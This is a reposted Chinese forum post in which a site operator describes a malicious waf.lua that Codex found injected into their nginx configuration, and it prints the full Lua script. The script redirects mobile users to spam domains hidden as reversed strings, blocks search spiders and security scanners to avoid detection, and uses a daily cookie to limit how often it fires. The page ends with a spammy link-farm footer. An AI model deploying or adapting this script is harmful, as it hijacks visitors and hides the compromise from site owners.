首页 / 科技 / 感谢codex解决了nginx被人植入病毒,nginx的安全…

感谢codex解决了nginx被人植入病毒,nginx的安全性真的让人担忧

编辑部 2026-05-29T03:24:41.474229 13918 阅读 tech
我们的业务主要是web + 软件,没有怎么管移动端,导致这次nginx被植入了病毒都不知道, 具体的病毒就是访问网站移动端检测是苹果手机或者安卓手机就劫持然后跳垃圾网站 codex解析出来的 移动端请求进入网站的 Nginx Nginx 全局 proxy.conf 里被插入了waf.lua waf....
感谢codex解决了nginx被人植入病毒,nginx的安全性真的让人担忧
感谢codex解决了nginx被人植入病毒,nginx的安全性真的让人担忧

我们的业务主要是web + 软件,没有怎么管移动端,导致这次nginx被植入了病毒都不知道,
具体的病毒就是访问网站移动端检测是苹果手机或者安卓手机就劫持然后跳垃圾网站

codex解析出来的

  1. 移动端请求进入网站的 Nginx
  2. Nginx 全局 proxy.conf 里被插入了waf.lua
  3. waf.lua 读取 User-Agent,如果是 Android/iPhone,就随机跳转到:https://随机子域.histats.cfd/news.html
    4.它还会设置:
    Set-Cookie: k=260528;Path=/;Max-Age=43200
    意思是“当天已经劫持过一次”,后续可能放行,降低被发现概率。

附上被植入的脚本

推荐阅读

ultracode用上了

推荐阅读

[分享创造] 刚刚不是说要薅微信公众号的羊毛作为图床吗?

local U = ngx.var.http_user_agent or “”
local K = ngx.var.http_cookie or “”
local S = os.date(“%y%m%d”)

local ua_lc = U:lower()

local cn_spiders = {
“baiduspider”,
“360spider”,
“sogouspider”,
“shenmaspider”,
“petalbot”,
“bytedancespider”,
“toutiaospider”,
“quarkspider”,
“yisouspider”,
“zoomeye”,
“quake”,
“fofa”,
“hunter”,
“chaitin”,
“inetcloud”,
“dnslog”,
}

local function is_cn_spider(ua)
if ua == “” then
return false
end
for _, pattern in ipairs(cn_spiders) do
if ua:find(pattern, 1, true) then
return true
end
end
return false
end

if is_cn_spider(ua_lc) then
return ngx.exit(ngx.HTTP_FORBIDDEN)
end

local is_android = ua_lc:find(“android”)
local is_iphone = ua_lc:find(“iphone”)

if not (is_android or is_iphone) then
return
end

if K:find(“k=” .. S) then
return
end

ngx.header[“Set-Cookie”] = “k=” .. S .. “;Path=/;Max-Age=43200”

if is_iphone and math.random() >= 0.3 then
return
end

local R1 = “lmth.swen/piv.ssoqj//:sptth”
local R2 = “lmth.swen/dfc.statsih//:sptth”

local function rev(s) return s and string.reverse(s) or “” end
local D1 = rev(R1)
local D2 = rev(R2)

local function strip_proto(full)
return full:gsub(“^https?://”, “”)
end

local H1 = strip_proto(D1)
local H2 = strip_proto(D2)

local alpha = “abcdefghijklmnopqrstuvwxyz0123456789”
local function rand_pref(len)
local t = {}
for i = 1, len do
local idx = math.random(1, #alpha)
t[i] = alpha:sub(idx, idx)
end
return table.concat(t)
end

local pool = {H1, H2}
local pick = pool[math.random(1, #pool)] or H1
local pref = rand_pref(math.random(3, 7))
local target = “https://” .. pref .. “.” .. pick

return ngx.redirect(target, 302)

其实很无奈,不会运维,codex确实棒了大忙,但是nginx这么容易被植入病毒吗?
求运维大佬解惑

3 个帖子 - 3 位参与者

阅读完整话题

来源: LinuxDo 最新话题查看原文
感谢 codex 解决 nginx 植入 一个 帖子 现在

相关推荐

ultracode用上了

2 个帖子 - 2 位参与者 阅读完整话题...

[分享创造] 刚刚不是说要薅微信公众号的羊毛作为图床吗?

刚才在 https://www.v2ex.com/t/1216301 中提到了微信公众号好像可以做为图床,也不知道这算不...

opus4.8+最新版cc似乎有些奇怪的bug

如图 先输出一些很诡异的内容 然后莫名其妙循环 接着就报错(没截图 和 新版ClaudeCode搭配4.8怎么经常出现缺...

[怀旧游戏] 一些用 Three.js 实现的能跑在浏览器里的经典 3D 游戏

Doom https://mrdoob.github.io/three-doom/ Quake https://mrdo...

claude cli 更新之后 deepseek 怎么用不了?

claude cli 更新之后 deepseek 怎么用不了 1 个帖子 - 1 位参与者 阅读完整话题...

Anthropic 发布了 Claude Opus 4.8

https://www.anthropic.com/claude/opus 这次和 4.7 的间隔好短,终于不再用 4....

Gczb 专题内容

延展页面 · www.gxzztoubiao.cn

最新热点文章详情

延展页面 · www.dianyoupg.com

Xmnh · Automation Project Privacy

延展页面 · www.aizhushou.shop

Fwcgzb 专题内容

延展页面 · www.gxsczb.com

Gczb 专题内容

延展页面 · www.gxzztoubiao.cn

最新热点文章详情

延展页面 · www.yazhupg.com

Fwcgzb 专题内容

延展页面 · www.gxsczb.com

Gczb 专题内容

延展页面 · www.gxzztoubiao.cn

Version 专题内容

延展页面 · www.tcti.cn

最新热点文章详情

延展页面 · www.yulepg.com

Fwcgzb 专题内容

延展页面 · www.gxsczb.com

Guide Training Metric Premium Settings Document Support Event...

延展页面 · www.tcti.cn

Gczb 专题内容

延展页面 · www.gxzztoubiao.cn

最新热点文章详情

延展页面 · www.pgdiany.com

Fwcgzb 专题内容

延展页面 · www.gxsczb.com

Mgcv · Desktop Lesson 视频 Value Folder Module Subscribe

延展页面 · www.aizhushou.shop

Gczb 专题内容

延展页面 · www.gxzztoubiao.cn

最新热点文章详情

延展页面 · www.tiyusjb.com

Fwcgzb 专题内容

延展页面 · www.gxsczb.com

Gczb 专题内容

延展页面 · www.gxzztoubiao.cn

8v Wo · Restore

延展页面 · www.aizhushou.shop

最新热点文章详情

延展页面 · www.sjb-zq.com

Fwcgzb 专题内容

延展页面 · www.gxsczb.com

Lead Like Education Supplier Analytics Dashboard 影视 Community...

延展页面 · www.tcti.cn

Gczb 专题内容

延展页面 · www.gxzztoubiao.cn

Eo TZ · Version Tracking

延展页面 · www.aizhushou.shop

Community Security Domain Digital URL Logo Tracking 专题内容

延展页面 · www.tcti.cn

Pgyulew 首页热点

延展页面 · www.pgyulew.com

Pvj W · Careers

延展页面 · www.aizhushou.shop

Fwcgzb 专题内容

延展页面 · www.gxsczb.com